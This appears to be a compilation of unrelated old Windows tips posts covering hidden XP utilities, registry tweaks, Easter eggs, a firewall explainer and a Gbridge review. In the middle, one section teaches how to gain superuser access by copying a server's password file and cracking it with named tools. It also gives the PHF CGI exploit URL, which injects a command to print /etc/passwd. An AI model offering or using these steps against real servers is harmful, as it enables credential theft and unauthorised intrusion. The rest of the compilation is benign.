To run any of these apps go to Start > Run and type the executable name (ie charmap).

WINDOWS XP HIDDEN APPS:
=========================================

1) Character Map = charmap.exe (very useful for finding unusual characters)

2) Disk Cleanup = cleanmgr.exe

3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)

4) Dr Watson = drwtsn32.exe (Troubleshooting tool)

5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)

6) Private character editor = eudcedit.exe (allows creation or modification of characters)

7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)

Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).

9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).

10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)

11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).

12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only )

13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).

14) Remote Access phone book = rasphone.exe (documentation is virtually non-existant).

15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).

16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).

17) File siganture verification tool = sigverif.exe

18) Volume Contro = sndvol32.exe (I’ve included this for those people that lose it from the System Notification area).

19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98! ).

20) Syskey = syskey.exe (Secures XP Account database – use with care, it’s virtually undocumented but it appears to encrypt all passwords, I’m not sure of the full implications).

21) Microsoft Telnet Client = telnet.exe

22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).

23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).

24) System configuration = msconfig.exe (can use to control starup programs)

25) gpedit.msc used to manage group policies, and permissions[a very powerful tool if you know how to use it properly;-) ]

In order to run some of the above mentioned programs, you need to have an administrator groups account. Each of this tools deserves an entire tutorial of its own. Maybe soon i will come up with some more fascinating facts and tutorials about each of them.

When you schedule CHKDSK to run at the next boot, the system will prompt you to press a key to cancel the operation while CHKDSK is running. The system will display a countdown during that cancel period.

The default value is 10 seconds.

To Change this open up Regedit and locate:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AutoChkTimeOut

You can change the value to anything from zero to 259,200 seconds (3 days). With a timeout of zero, there is no countdown and you cannot cancel the operation.

If you are a system administrator on a network who wants to ensure that no user can skip disk checking, so set the countdown to zero. Or you can play a little prank with your friend by increasing the countdown time on his computer.

Let’s do some fun stuff today….

open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:
————————————————————————————-
[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here

————————————————————————————-

1. Save the file.

2. Then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.

3. Now if you want to display some more information then simply increase the line in the file.

ex: Line4=Your Working Hours Here

Google’s calculator tries to understand the problem you are attempting to solve without requiring you to use special syntax. However, it may be helpful to know the most direct way to pose a question to get the best results. Listed below are a few suggestions for the most common type of expressions (and a few more esoteric ones).

Most operators come between the two numbers they combine, such as the plus sign in the expression 1+1.

Operator Function Example
+ (addition) :- 3+44
- (subtraction):- 13-5
* (multiplication):- 7*8
/ (division):- 12/3
^ (exponentiation (raise to a power of)):- 8^2
% modulo (finds the remainder after division) 8%7
choose X choose Y determines the number of ways of choosing a set of Y elements from a set of X elements 18 choose 4
th root of calculates the nth root of a number 5th root of 32
% of X % of Y computes X percent of Y 20% of 150

Some operators work on only one number and should come before that number. In these cases, it often helps to put the number in parentheses.

Operator Function Example
sqrt square root sqrt(9)
sin, cos, etc. trigonometric functions (numbers are assumed to be radians) sin(pi/3)
tan(45 degrees)
ln logarithm base e ln(17)
log logarithm base 10 log(1,000)

A few operators come after the number.

Operator Function Example
! factorial 5!

Other good things to know

You can force the calculator to try and evaluate an expression by putting an equals sign (=) after it. This only works if the expression is mathematically resolvable. For example, 1-800-555-1234= will return a result, but 1/0= will not.

Parentheses can be used to enclose the parts of your expression that you want evaluated first. For example, (1+2)*3 causes the addition to happen before the multiplication.

The in operator is used to specify what units you want used to express the answer. Put the word in followed by the name of a unit at the end of your expression. This works well for unit conversions such as: 5 kilometers in miles.

You can use hexadecimal, octal and binary numbers. Prefix hexadecimal numbers with 0x, octal numbers with 0o and binary numbers with 0b. For example: 0×7f + 0b10010101.

The calculator understands many different units, as well as many physical and mathematical constants. These can be used in your expression. Many of these constants and units have both long and short names. You can use either name in most cases. For example, km and kilometer both work, as do c and the speed of light.

Feel free to experiment with the calculator as not all of its capabilities are listed here. To get you started, we’ve included a few expressions linked to their results.

1 a.u./c
56*78
1.21 GW / 88 mph
e^(i pi)+1
100 miles in kilometers
sine(30 degrees)
G*(6e24 kg)/(4000 miles)^2
0×7d3 in roman numerals
0b1100101*0b1001

More info on:

http://www.google.co.in/help/calculator.html

Easter Eggs are undocumented, hidden tidbits in software, games, etc., that users accidentally stumble upon. These are fun to find, and thousands have already been documented. Easter eggs started out as a rebellion by early programmers who did not get credit for their work. That’s why some of them are as simple as a scrolling list of programmers. However, you also find some as advanced as a hidden car racing game in Excel 2000. So read on to explore the amusing world of Easter eggs.

Windows XP :

Unexpected shutdown:-You will be needing a software called Resource Hacker. Please refer my earlier post how-to-customise-your-start-button to know how to get Resource Hacker. Resource Hacker is a free tool to view and modify 32-bit Windows executables and resource files.

Open the msgina.dll file, located in the C:\Windows\System32 directory, in Resource Hacker. In the left pane, expand Dialog > 2210 > 1033. A dialog box opens at the bottom right hand of the screen. Notice the line just below the drop-down list entitled ‘Why did the computer shut down unexpectedly?!’

Solitare Win Win:-Force Solitare to win by a hack. Here’s how: Open sol.exe located in C:\Windows\System32\ using Resource Hacker. Expand String Table > 64 > 1033 in the left pane. Notice a line in the right pane saying 1010, “Force a win”. Use these numbers to enable the Easter Egg. Now expand Menu > 1 > 1033. Create a menu by typing the following just before the last closing brace:
POPUP “&Easter Egg”
{
MENUITEM “&Egg 1″, 1008
MENUITEM “&Egg 2″, 1009
MENUITEM “&Egg 3″, 1010
}

Now, click the Compile Script button. Next, go to File > Save and save it in the original location, i.e., C:\Windows\System32\sol.exe. Also, replace sol.exe in the C:\Windows\System32\dllcache folder.

Now, a new menu Easter Egg appears with Egg 1, Egg 2 and Egg 3 as options. Click Egg 3 to force a win.

WinRAR:
Works on: WinRAR 3.20, 3.30
Falling Book:-WinRAR—the popular file compression utility—has a smart Easter Egg. Start WinRAR and go to Help > About. Next, click the book icon and it starts to fall. Further, if you press and hold [Shift], and click the logo, you see a small sail boat near the letter ‘R’. You may have to click a few times to see it , though.

Winamp:

Works on: Winamp 2.91:
Full Screen Credits:- Start Winamp, go to Winamp menu, click Nullsoft Winamp and switch to the Credits tab to see an animated screen. Now, hold down [Ctrl] + [Alt] and rightclick twice on the animation. This changes it to full-screen mode and alters the animation a bit. Repeat the same step to get back to normal mode. This full-screen animation depends on the active visualization. Change it to spectrum and then oscilloscope and repeat the process to see the difference.

Works On: Winamp 5:
Full Screen Credits:An animated logo comes up as you go to Winamp menu > Nullsoft Winamp and click the Winamp tab. Press and hold [Shift] and double-click on this logo to change it to an ASCII art.

Dancing Llamas:This is one amusing egg in Winamp 5. First play a song with fast beats and heavy bass. Now, switch to the modern skin and resize the main window. Increase its width to make the Beat Analyzer visible to the left of the Spectrum Analyzer. Now, hold down [Shift] + [Ctrl] + [Alt] and click the centre of the Beat Analyzer. You’ll see two llamas striking their heads on the ground in tune with each beat.

Requires Windows XP or 2000,Winamp5
Transparent Beats:- Play a song that’s akin to the one described above. Now, ensure that the main window has the focus (its title bar should be brighter than that of other windows) and type ‘NULLSOFT’. However, since pressing [L] opens the File Open dialog, you’ll have to press [Esc] after each [L]. Hence, you end up typing [N] [U] [L] [Esc] [L] [Esc] [S] [O] [F] [T]. This done, you see that the main window goes transparent at each beat and then reverts to being opaque. This Easter egg consumes a lot of system resources. If your system runs slow, type NULLSOFT again to turn it off, or just exit Winamp and restart it. In Winamp 2.91, the title bar shows a funny change when you do the same thing. Try this and see yourself.

Windows 98:
Teapot:
Works on: Windows 98, Windows 95

Right-click on the desktop and select Properties. Go to the Screensaver tab and choose the Pipes screensaver. Click Settings and select Pipes as Multiple, Pipe Style as Traditional, Joint Type as Mixed and Surface Style as Solid. Click OK and then click the Preview button. Watch the screensaver churn out teapots instead of joints!

Windows 98 team:
Go to C:\Windows\ ApplicationData\ Microsoft\WELCOME and find the file Weldata.exe. Right-click it and select Create Shortcut. Now, rightclick the shortcut and select Properties. In the General tab, add Y o u _ a r e _ a_real_rascal to the Target text box, after the path, and choose Minimized in the Run combo box. Click OK, doubleclick the shortcut and enjoy!

Windows 98 team:
Version 2
Works on:Windows 98 There is another way to view
Windows 98 team credits. Double-click the clock in the system tray to bring up the Date and Time Properties. Click the Time Zone tab, hold down [Ctrl] and click and hold the mouse button on Cairo, Egypt. With the mouse button still pressed, drag the pointer to Baton Rouge, LA. Release the mouse button but keep [Ctrl] pressed. Click on Baton Rouge, LA again and drag it to Redmond, WA. The credits movie starts to play once you release the mouse button. You can also try doing the same thing in Regional Settings under Control Panel.

I hope today’s article will be able to meet most of your queries about firewall. Though it is a huge subject to discuss but i have tired to include at most i can for now. I hope you will enjoy. Please don’t forget to add comment about the article or if you have any more interesting info that you wanna share with us.

What is a Firewall?
A firewall is a tool that monitors communication to and from your computer. It sits between your computer and the rest of the network, and according to some criteria, it decides which communication to allow, and which communication to block. It may also use some other criteria to decide about which communication or communication request to report to you (either by adding the information to a log file that you may browse whenever you wish, or in an alert message on the screen), and what not to report.

What Is It Good For?
Identifying and blocking remote access Trojans. Perhaps the most common way to break into a home computer and gain control, is by using a remote access Trojan (RAT). (sometimes it is called “backdoor Trojan” or “backdoor program”. Many people simply call it a “Trojan horse” although the term “Trojan horse” is much more generic). A Trojan horse, is a program that claims to do something really innocent, but in fact does something much less innocent. This goes to the days where the Greek soldiers succeeded to enter through the gates of Troy by building a big wooden horse, and giving it as a present to the king of Troy. The soldiers allowed the sculpture to enter through their gates, and then at night, when the soldiers were busy guarding against an outside attack, many Greek soldiers who were hiding inside the horse went out and attacked Troy from the inside. This story, which may or may not be true, is an example of something which looks like something innocent and is used for some less innocent purpose. The same thing happens in computers. You may sometimes get some program, via ICQ, or via Usenet, or via IRC, and believe this program to be something good, while in fact running it will do something less nice to your computer. Such programs are called Trojan horses. It is accepted to say that the difference between a Trojan horse and a virus, is that a virus has the ability to self-replicate and to distribute itself, while a Trojan horse lacks this ability. A special type of Trojan horses, is RATs (Remote Access Trojans, some say “remote admin Trojans”). These Trojans once executed in the victim’s computer, start to listen to incoming communication from a remote matching program that the attacker uses. When they get instructions from the remote program, they act accordingly, and thus let the user of the remote program to execute commands on the victim’s computer. To name a few famous RATs, the most common are Netbus, Back-Orifice, and SubSeven (which is also known as Backdoor-G). In order for the attacker to use this method, your computer must first be infected by a RAT.
Prevention of infections by RATs is no different than prevention of infection by viruses. Antivirus programs can identify and remove most of the more common RATs. Personal firewalls can identify and block remote communication efforts to the more common RATs and by thus blocking the attacker, and identifying the RAT.

Blocking/Identifying Other Types of Trojans and WQorms?
There are many other types of Trojan horses which may try to communicate with the outside from your computer. Whether they are e-mail worms trying to distribute themselves using their own SMTP engine, or they might be password stealers, or anything else. Many of them can be identified and blocked by a personal firewall.

Identifying/Blocking Spyware’s/Adbots?
The term “spyware” is a slang which is not well defined. It is commonly used mainly for various adware (and adware is a program that is supported by presenting advertisements to the user), and that during their installation process, they install an independent program which we shall call “adbot”. The adbot runs independently even if the hosting adware is not running, and it maintains the advertisements, downloads them from the remote server, and provides information to the remote server. The adbot is usually hidden. There are many companies that offer adbots, and advertisements services to adware. The information that the adbots deliver to their servers from the computer where the adbot is installed, is “how much time each advertisement is shown, which was the hosting adware, and whether the user clicked on the advertisement. This is important so that the advertisements server will be able to know how much money to get from each of the advertised companies, and how much from it to deliver to each of the adware maintainers. Some of the adbots also collect other information in order to better choose the advertisements to the users. The term “spyware” is more generic, but most of the spyware fall into this category. Many types of adbots can be identified and blocked by personal firewalls.

Blocking Advertisements?
Some of the better personal firewalls can be set to block communication with specific sites. This can be used in order to prevent downloading of advertisements in web pages, and thus to accelerate the download process of the web sites. This is not a very common use of a personal firewall, though.

Preventing Communication to Tracking Sites?
Some web pages contain references to tracking sites. e.g. instruct the web browser to download a small picture (sometimes invisible) from tracking sites. Sometimes, the pictures are visible and provide some statistics about the site. Those tracking sites will try to save a small text either as a small file in a special directory, or as a line in a special file (depending on what is your browser), and your browser will usually allow the saving site to read the text that it saved on your computer. This is called “web cookies” or sometimes simply “cookies”. Cookies allow a web site to keep information that it saved some time when you entered it, to be read whenever you enter the site again. This allow the web site to customize itself for you, and to keep track on everything that you did on that site. It does not have to keep that information on your computer. All it has to save on your computer is a unique identifying number, and then it can keep in the server’s side information regarding what has been done by the browser that used that cookie. Yet, by this method, a web site can get only information regarding your visits in it. Some sites such as “doubleclick” or “hitbox” can collect information from various affiliated sites, by putting a small reference in the affiliated pages to some picture on their servers. When you enter one of the affiliated web pages, your browser will communicate with the tracking site, and this will allow the tracking site to put or to read a cookie that identifies your computer uniquely, and it can also know what was the web page that referred to it, and any other information that the affiliated web site wanted to deliver to the tracking site. This way tracking sites can correlate information from many affiliated sites, to build information that for example will allow them to better customize the advertisements that are put on those sites when you browse them.
Some personal firewalls can be set to block communication to tracking sites. It is not a common use of a personal firewall, though, and a personal firewall is not the best tool for that, but if you already have one, this is yet another possible use of it.

Blocking or Limiting the NetBIOS Communication? (as well as other default services)
The two common methods of intruders to break into home computers, are through a RAT (which was discussed in II.3a) and through the NetBIOS communication. The NetBIOS is a standard for naming computers in small networks, developed long ago by IBM and Microsoft. There are a few communication standards which are used in relation to the NetBIOS. The ones that are relevant for Microsoft Windows operating systems, are: NBT (NetBIOS over TCP/IP), IPX/SPX, and NetBEUI. The communication standard which is used over the Internet, is NBT. If it is enabled, and there is no firewall or something else in the middle, it means that your computer is listening for communications over the Internet via this standard, and will react according to the different NBT commands that it gets from the remote programs. It is thus that the NBT (which sometimes loosely called “NetBIOS”) is acting as a server. So the next question should be “what remote NBT commands the NBT server will do on the local computer”. The answer to this question depends on the specific setting on your computer. You may set your computer to allow file and print sharing. If also NBT is enabled, it means that you allow remote users to share your files or printers. This is a big problem. It is true that in principle the remote user has to know your password for that computer, but many users do not set a password for their user on Windows, or set a trivial password. Older versions of Win95 had file and print sharing over NetBIOS enabled by default. On Win98, and WinMe it was disabled by default, but many technicians, when they set a home network, they enable the file and print sharing, without being aware that it influences also the authorizations of a remote Internet user. There are even worms and viruses who use the File sharing option to spread in the Internet. Anyway, no matter whether you need it for some reason or just are not aware of it, a personal firewall can identify and block any external effort to communicate with the NetBIOS server on your computer. The more flexible personal firewalls can be set to restrict the authorization to communicate with the NetBIOS. Some Windows operating systems, especially those which are not meant for home uses, offer other public services by default, such as RPC. A firewall can identify communication efforts to them, and block them. Since such services listen to remote communications, there is a potential risk when there are efforts to exploit security holes in the programs that offer the services, if there are such security holes. A firewall may block or limit the communication to those services.

Hiding Your Computer on the Internet?
Without a firewall, on a typical computer, even if well maintained, a remote person will still be able to know that the communication effort has reached some computer, and perhaps some information about the operating system on that computer. If that computer is handled well, the remote user will not be able to get much more information from your computer, but might still be able to identify also who your ISP is, and might decide to invest further time in cracking into your computer.
With a firewall, you can set the firewall so that any communication effort from remote users (in the better firewalls you may define an exception list) will not be responded at all. This way the remote user will not be able to even know that it reached a live computer. This might discourage the remote attacker from investing further time in effort to crack into your computer.

The Non-Firewall Defenses

We’ve discussed a few situations where a personal firewall can provide defense. Yet, in many cases a computer maintainer can deal with those situations even without a firewall. Those “alternative” defenses, in many cases are recommended regardless of whether you use a firewall or not.

Remote Access Trojans?
The best way to defend against remote access Trojans (RATs) is to prevent them from being installed in the first place on your computer. A RAT should first infect your computer in order to start to listen to remote communication efforts. The infection techniques are very similar to the infection techniques that viruses use, and hence the defense against Trojan horses is similar to the defense against viruses. Trojan horses do not distribute themselves (although they might be companions of another Internet worm or virus that distributes them. Yet, because in most cases they do not distribute themselves, it is likely that you will get them from anonymous sources, such as instant messengers, Kazaa, IRC, or a newsgroup. adopting a suspicious policy regarding downloads from such places, will save you not only from viruses but also from getting infected with Trojan horses, including RATs. Because Trojan horses are similar in some ways to viruses, almost all antivirus programs can identify, block from being installed, and remove most of the Trojan horses, including all the common ones. There are also some programs (sometimes called antiTrojan programs) which specialize in the identification and removal of Trojan horses. For a list of those programs, and for comparison on how well different antivirus, and antiTrojan programs identify different Trojan horses, see Hackfix (http://www.hackfix.org), under “Software test results”. Hackfix also has information on the more common RATS (such as the Netbus and the Subseven) and on how to remove them manually. There are some tools and web sites, such port scanners, and some ways with a use of more generic tools such as telnet, msconfig, and netstat, which may help you to identify a RAT.

Other types of Trojans and worms?
Also here your main interest should be to prevent them from infecting your computer in the first place, rather than blocking their communication. A good antivirus and a good policy regarding the prevention of virus infections, should be the first and most important defense.

Spyware and Adbots?
The term spyware is sometimes misleading. In my view, it is the responsibility of the adware developer to present the fact that the adware installation will install or use an independent adbots, and to provide the information on how this adbot communicates, and which information it delivers, in a fair place and manner before the adware is installed. It is also a responsibility to provide this information in their web sites, so that people will be aware of that before they even download the software. Yet, in general, those adbots do not pose any security threat, and in many cases also their privacy threat is negligible for many people (e.g. the computer with adbot number 1127533 has been exposed to advertisements a, b, c, such and such times, while using adware x, while on computer with adbot number 1127534 has been exposed to advertisements a,d, and e, such amount of time, with the use of adware y, and clicked on ads number d). It should be fully legitimate for software developers to offer an advertisement supported programs, and it is up to the user to decide whether the use of the program worth the ads and the adbot, or not. Preventing adbot from communicating is generally not a moral thing. If you decide to use an adware, you should pay the price of letting the adbot work. If you don’t want it, please remove the adware, and only if for some reason the adbot continue to work even if no hosting adware that uses it is installed, you may remove the adbot. Anyway, there are some very useful tools to identify whether a program is a “spyware”, or whether a “spyware” is installed on your computer, and you are certainly entitled to this information. Two useful programs are “AdAware” which identifies “spyware” components on your computer and allows you to remove them, and Ad-Search which allows you to provide a name of a program, and it tells you whether this program is a “spyware” and which adbot it uses. It is useful to assist you in choosing whether to install a program or not. You may find those programs in http://www.lavasoft.nu (or, if it doesn’t work, you may try http://www.lavasoftusa.com). Those programs are useful, mainly because many adware developers are not fair enough to present this information in a fair manner. AdAware allows you to also remove those adbot components from your computer. This might, however, terminate your license to use the hosting adware programs, and might even cause them to stop functioning. A website which offers to check whether a specific program that you wish to install is “spyware” or not, is http://www.spychecker.com .

Well one of the easiest ways of getting superuser access is through
anonymous ftp access into a webpage. First you need learn a little about
the password file…

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

This is an example of a regular encrypted password file. The Superuser is
the part that gives you root. That’s the main part of the file.

root:x:0:1:Superuser:/:
ftp:x:202:102:Anonymous ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrator:/u1/ftp

This is another example of a password file, only this one has one little
difference, it’s shadowed. Shadowed password files don’t let you view or
copy the actual encrypted password. This causes problems for the password
cracker and dictionary maker(both explained later in the text). Below is
another example of a shadowed password file:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Shadowed password files have an “x” in the place of a password or sometimes
they are disguised as an * as well.

Now that you know a little more about what the actual password file looks
like you should be able to identify a normal encrypted password from a shadowed
password file. We can now go on to talk about how to crack it.

Cracking a password file isn’t as complicated as it would seem, although the
files vary from system to system.

1.The first step that you would take is to download or copy the file.

2. The second step is to find a password cracker and a dictionary maker. Although it’s nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file… When you start a cracking program you will be asked to find the the password file. That’s where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) .

3. You then start up the cracker and follow the directions that it gives you.

The PHF Technique:

Well I wasn’t sure if I should include this section due to the fact that
everybody already knows it and most servers have already found out about
the bug and fixed it. But still i thought that you should know about it. So I decided to include it.

The phf technique is by far the easiest way of getting a password file
(although it doesn’t work 95% of the time). But to do the phf all you do
is open a browser and type in the following link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

You replace the webpage_goes_here with the domain. So if you were trying to
get the pw file for www.webpage.com you would type:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

and that’s it! You just sit back and copy the file(if it works)

More than a few commenters had questions about the Gbridge tool for Windows we featured last week, which works on top of your Google account to provide file sharing and remote desktop capabilities. Why does it bother using Google accounts? Is it any better or different than LogMeIn or Techinline? Is it secure? We spent some time checking out Gbridge, and came away impressed with its ease of use and nifty features, along with a few answers to your questions and screenshots.

First off, Gbridge uses your Google account username and password in large part to save you and any friends you connect to the trouble of having to create new accounts (and remember new passwords) at Gbridge. It also uses the Google Talk service’s authentication, and claims to encrypt all network traffic it passes through GTalk’s servers. Furthermore, the app makers state in their FAQ that everything gets encrypted and authenticated between Gbridge clients. That may not be enough assurance for IT managers or anyone backing up super-private files, but if you’re still interested, let’s check out what Gbridge can do.

Setting up Gbridge and file sharing

After heading to Gbridge’s web site and downloading the Windows client, installing is relatively straightforward. All users will see a black-and-white command prompt pop up, which is normal. Vista users, however, may see this dire warning, but Gbridge informs you to let it slide and hit “Allow”:

Once you move past the technicals, you’ll be asked for your Gmail/Google account information, and to give a host name (of less than 8 characters).

When everything’s set up, you’re ready to get rolling, but you might want to set up Gbridge on any other computers you own to create a virtual network amongst your boxes. That’s right—you can install and auto-start Gbridge on multiple computers, using the same Gmail logon, and it will keep all those computers connected and ready to trade or stream files. In the example below, I used my Gmail account to hook my Vista laptop up to my wife’s laptop. Each has a different host name, but they’re otherwise linked together.

The easiest way to use Gbridge is to create “SecureShares.” Hit the big button for SecureShares at the top on the Gbridge client that’s doing the sharing, choose a folder, and choose the people who can access it and set a password. You can allow only your other boxes to grab files, or invite friends also using Gbridge to check out you wares. Those files are shared through a browser link that only works for Gbridge-connected systems. On the sharing page, documents and files are offered up for right-click grabbing, but pictures and music files are available for instant viewing or playing. Streaming my wife’s MP3 collection yielded super-snappy playback, and the album cover organization is a slick touch:

Using Gbridge for backup

The browser-based sharing is nice, but if you’ve got a folder full of Word documents and spreadsheets you want to keep synchronized between systems, Gbridge has got you covered. Click “Add EasyBackup” on the computer that’s got the stuff to be saved, and you’ll be prompted to store it either on your local machine or on a remote system. This can be, of course, either your same-account box or a generous friend’s system. If it’s a one-time thing, it’s an easy move to enter a password and send the files, but you can also set up “AutoSyncs” with custom frequency:

There are more options to setting up backups, of course, but it can also be just that easy. If you need files sooner than your automated backups, just right-click a folder in Gbridge’s main “Friends” tree listing, and select “AutoSync Download It.”

Desktop sharing

GBridge comes bundled with its own lightweight VNC client for troubleshooting your friends and relatives’ PCs, but will defer to your default VNC client or, if you’re rocking XP Professional or Vista Ultimate, Microsoft’s own Remote Desktop Protocol for the actual desktop viewing. Making a connection requires a Gbridge friend or client to click “DesktopShare,” choose to allow DesktopShare requests, and set a password for the connection. The computer being connected to gets a small window that allows it to kill the connection at any time, and Gbridge’s connection seemed generally as responsive as a standard VNC hook-up between my household’s two laptops.

One more thing about Gbridge: Your standard Google Talk applications and Gmail-based IM will continue to work while you’re using the utility, but new chat windows will also pop up in Gbridge’s own desktop window. A friend noticed that my reply chat was prefaced with a “Kevin Purdy is using Gbridge” message, but I could’ve probably avoided that by replying in a standard chat client. Of course, Gbridge also includes buttons to invite your chat partners to download and connect through Gbridge.

That’s our tour of Gbridge’s features and functions, but Gbridge’s own site has an extensive FAQ and how-to section if you need particulars on setting up and connecting systems. If you’ve downloaded and tried out Gbridge, tell us all how it compares to other sharing and syncing clients, and what features you’d like to see included for better functionality.

http://www.gbridge.com/